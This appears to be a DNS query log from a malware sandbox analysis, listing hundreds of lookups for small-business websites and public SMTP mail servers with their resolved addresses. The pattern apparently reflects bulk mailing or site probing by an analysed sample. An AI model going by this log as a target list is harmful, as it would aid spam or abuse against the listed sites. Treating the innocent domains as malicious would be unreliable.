                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.831382990 CEST8.8.8.8192.168.2.60x2a13No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.831382990 CEST8.8.8.8192.168.2.60x2a13No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.481353998 CEST8.8.8.8192.168.2.60xe65bNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.527812958 CEST8.8.8.8192.168.2.60xd1ddNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.538666964 CEST8.8.8.8192.168.2.60x250fNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.568087101 CEST8.8.8.8192.168.2.60xacdbName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.722603083 CEST8.8.8.8192.168.2.60xc765No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.722603083 CEST8.8.8.8192.168.2.60xc765No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.818828106 CEST8.8.8.8192.168.2.60x7e99No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.953322887 CEST8.8.8.8192.168.2.60xf685No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.210242987 CEST8.8.8.8192.168.2.60x52d5No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.492916107 CEST8.8.8.8192.168.2.60xfcbdNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.492916107 CEST8.8.8.8192.168.2.60xfcbdNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.492916107 CEST8.8.8.8192.168.2.60xfcbdNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.846227884 CEST8.8.8.8192.168.2.60x9d9dNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.846227884 CEST8.8.8.8192.168.2.60x9d9dNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.856969118 CEST8.8.8.8192.168.2.60xdae0No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.249300003 CEST8.8.8.8192.168.2.60x15No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.330770016 CEST8.8.8.8192.168.2.60x20ccNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.330770016 CEST8.8.8.8192.168.2.60x20ccNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.330770016 CEST8.8.8.8192.168.2.60x20ccNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.330770016 CEST8.8.8.8192.168.2.60x20ccNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.330770016 CEST8.8.8.8192.168.2.60x20ccNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.495950937 CEST8.8.8.8192.168.2.60x45d5No error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.614712954 CEST8.8.8.8192.168.2.60x9115Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.630928040 CEST8.8.8.8192.168.2.60xd131Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.890999079 CEST8.8.8.8192.168.2.60x6250No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.986664057 CEST8.8.8.8192.168.2.60xbfa4No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.986664057 CEST8.8.8.8192.168.2.60xbfa4No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.076343060 CEST8.8.8.8192.168.2.60xecc1No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.076343060 CEST8.8.8.8192.168.2.60xecc1No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.076343060 CEST8.8.8.8192.168.2.60xecc1No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.076343060 CEST8.8.8.8192.168.2.60xecc1No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.076343060 CEST8.8.8.8192.168.2.60xecc1No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.947717905 CEST8.8.8.8192.168.2.60xb632No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.947717905 CEST8.8.8.8192.168.2.60xb632No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.947717905 CEST8.8.8.8192.168.2.60xb632No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:51.376939058 CEST8.8.8.8192.168.2.60x45d5Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:52.999578953 CEST8.8.8.8192.168.2.60xb054No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:52.999578953 CEST8.8.8.8192.168.2.60xb054No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.116400957 CEST8.8.8.8192.168.2.60xaad8No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.445892096 CEST8.8.8.8192.168.2.60x45d5Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.668998003 CEST8.8.8.8192.168.2.60xefd0Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.793740988 CEST8.8.8.8192.168.2.60xa025No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.793740988 CEST8.8.8.8192.168.2.60xa025No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.994214058 CEST8.8.8.8192.168.2.60x2a7bNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.994214058 CEST8.8.8.8192.168.2.60x2a7bNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:54.254080057 CEST8.8.8.8192.168.2.60x1636No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:54.701525927 CEST8.8.8.8192.168.2.60xf9bdNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:54.701525927 CEST8.8.8.8192.168.2.60xf9bdNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.624490976 CEST8.8.8.8192.168.2.60x7eabNo error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.624490976 CEST8.8.8.8192.168.2.60x7eabNo error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.624490976 CEST8.8.8.8192.168.2.60x7eabNo error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.624490976 CEST8.8.8.8192.168.2.60x7eabNo error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.624490976 CEST8.8.8.8192.168.2.60x7eabNo error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.804578066 CEST8.8.8.8192.168.2.60x91bNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.923916101 CEST8.8.8.8192.168.2.60xa28eNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.043416977 CEST8.8.8.8192.168.2.60xa2bNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.043416977 CEST8.8.8.8192.168.2.60xa2bNo error (0)d2r2uj0bnofxxz.cloudfront.net108.156.2.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.043416977 CEST8.8.8.8192.168.2.60xa2bNo error (0)d2r2uj0bnofxxz.cloudfront.net108.156.2.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.043416977 CEST8.8.8.8192.168.2.60xa2bNo error (0)d2r2uj0bnofxxz.cloudfront.net108.156.2.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.043416977 CEST8.8.8.8192.168.2.60xa2bNo error (0)d2r2uj0bnofxxz.cloudfront.net108.156.2.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.243323088 CEST8.8.8.8192.168.2.60x3d79No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:57.078001022 CEST8.8.8.8192.168.2.60x48adNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:57.247525930 CEST8.8.8.8192.168.2.60x8eecNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.527204037 CEST8.8.8.8192.168.2.60xab51No error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.536035061 CEST8.8.8.8192.168.2.60xab94No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.722507954 CEST8.8.8.8192.168.2.60xf721No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.933222055 CEST8.8.8.8192.168.2.60x3a03No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.940848112 CEST8.8.8.8192.168.2.60xad88No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.156481981 CEST8.8.8.8192.168.2.60x5124No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.156481981 CEST8.8.8.8192.168.2.60x5124No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.799225092 CEST8.8.8.8192.168.2.60xef3dNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.888613939 CEST8.8.8.8192.168.2.60x219fNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.378488064 CEST8.8.8.8192.168.2.60x6724No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.408902884 CEST8.8.8.8192.168.2.60xad86No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.662560940 CEST8.8.8.8192.168.2.60x198bNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.662560940 CEST8.8.8.8192.168.2.60x198bNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.738883972 CEST8.8.8.8192.168.2.60xb782No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.738883972 CEST8.8.8.8192.168.2.60xb782No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.168279886 CEST8.8.8.8192.168.2.60xc22bNo error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.182645082 CEST8.8.8.8192.168.2.60xab69No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.298054934 CEST8.8.8.8192.168.2.60x6241No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.634803057 CEST8.8.8.8192.168.2.60x926fName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.686754942 CEST8.8.8.8192.168.2.60xe96bName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:02.210869074 CEST8.8.8.8192.168.2.60x72baNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.314903975 CEST8.8.8.8192.168.2.60xe264No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.323714972 CEST8.8.8.8192.168.2.60x3aa7No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.329361916 CEST8.8.8.8192.168.2.60xcc64Name error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.411170959 CEST8.8.8.8192.168.2.60x65a0No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.411170959 CEST8.8.8.8192.168.2.60x65a0No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.411170959 CEST8.8.8.8192.168.2.60x65a0No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.633883953 CEST8.8.8.8192.168.2.60x1522No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.633883953 CEST8.8.8.8192.168.2.60x1522No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.633883953 CEST8.8.8.8192.168.2.60x1522No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.633883953 CEST8.8.8.8192.168.2.60x1522No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.635725975 CEST8.8.8.8192.168.2.60x837dNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.635725975 CEST8.8.8.8192.168.2.60x837dNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.640737057 CEST8.8.8.8192.168.2.60x5c4eNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.659360886 CEST8.8.8.8192.168.2.60x68a7No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.659595013 CEST8.8.8.8192.168.2.60x69caNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.659863949 CEST8.8.8.8192.168.2.60xdaeeNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.659863949 CEST8.8.8.8192.168.2.60xdaeeNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.663463116 CEST8.8.8.8192.168.2.60x88ccNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.663463116 CEST8.8.8.8192.168.2.60x88ccNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.671809912 CEST8.8.8.8192.168.2.60xbbf0No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.722450018 CEST8.8.8.8192.168.2.60x8f2cNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.722886086 CEST8.8.8.8192.168.2.60x5aefNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.730442047 CEST8.8.8.8192.168.2.60xd59eNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.731982946 CEST8.8.8.8192.168.2.60xcf02No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.753881931 CEST8.8.8.8192.168.2.60xa15cNo error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.766278028 CEST8.8.8.8192.168.2.60x7a3dNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.816881895 CEST8.8.8.8192.168.2.60x3404No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.822973013 CEST8.8.8.8192.168.2.60xbe3bNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.842302084 CEST8.8.8.8192.168.2.60x9985No error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.920166969 CEST8.8.8.8192.168.2.60xf73dNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.922713041 CEST8.8.8.8192.168.2.60x8e53No error (0)gmail-smtp-in.l.google.com108.177.126.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.046791077 CEST8.8.8.8192.168.2.60x5447No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.210794926 CEST8.8.8.8192.168.2.60x8b31No error (0)in1.smtp.messaginguser.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.260767937 CEST8.8.8.8192.168.2.60xe753No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.275100946 CEST8.8.8.8192.168.2.60xd395No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.322904110 CEST8.8.8.8192.168.2.60x34dbNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.359354019 CEST8.8.8.8192.168.2.60xe09bNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.367537975 CEST8.8.8.8192.168.2.60x59e9No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.367969036 CEST8.8.8.8192.168.2.60x1d94No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.369297028 CEST8.8.8.8192.168.2.60x4b2No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.369297028 CEST8.8.8.8192.168.2.60x4b2No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.369297028 CEST8.8.8.8192.168.2.60x4b2No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.369297028 CEST8.8.8.8192.168.2.60x4b2No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.370786905 CEST8.8.8.8192.168.2.60xf8bcNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.385479927 CEST8.8.8.8192.168.2.60xcb1eNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.392663956 CEST8.8.8.8192.168.2.60xb70dNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.394198895 CEST8.8.8.8192.168.2.60x1d30No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.394198895 CEST8.8.8.8192.168.2.60x1d30No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.394198895 CEST8.8.8.8192.168.2.60x1d30No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.416515112 CEST8.8.8.8192.168.2.60xf62bNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.417747974 CEST8.8.8.8192.168.2.60x51a0No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.418479919 CEST8.8.8.8192.168.2.60xdb5fNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.456171036 CEST8.8.8.8192.168.2.60x2c12No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.462441921 CEST8.8.8.8192.168.2.60xf711No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.463592052 CEST8.8.8.8192.168.2.60xd4bcNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.467187881 CEST8.8.8.8192.168.2.60xeaf9No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.469121933 CEST8.8.8.8192.168.2.60x3d21No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.473145962 CEST8.8.8.8192.168.2.60x4709No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
